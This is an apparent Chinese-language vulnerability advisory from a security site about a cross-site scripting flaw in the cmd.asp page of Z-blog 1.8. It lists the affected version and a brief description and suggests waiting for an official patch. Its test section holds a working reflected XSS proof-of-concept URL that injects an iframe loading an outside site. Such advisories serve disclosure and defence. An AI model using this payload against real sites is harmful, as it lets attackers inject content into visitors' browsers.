中文(Chinese) 英文(English) Tel: 4006-858-981           Msn: China@Safe.sh         QQ: 7387526       Server Hosting        加入收藏
主页 >> 安全风向标 >> 漏洞播报
安全风向标
分类
Z-blog 1.8 cmd.asp xss跨站漏洞
影响版本:
Z-blog 1.8

漏洞描述:
Zblog是基于Asp平台的Blog博客(网志)程序

cmd.asp在对用户提交数据处理上存在安全漏洞

<*参考
http://safe.sh/
*>

测试方法:
[www.safe.sh]
本站提供程序(方法)可能带有攻击性,
仅供安全研究与教学之用,风险自负!

http://www.ssvdb.com/cmd.asp?act=gettburl&id=10"><iframe%20src=http://www.mramydnei.com%20></iframe>

Safe.sh安全建议:
等待官方发补丁
页面工具 打印 | 电子邮件 | 评价
关于我们 | | 沪ICP备12021423号-1 | 联系我们 友情链接 | 站点地图 | 隐私 | 法律 | Copyright © 2018 Safe.Sh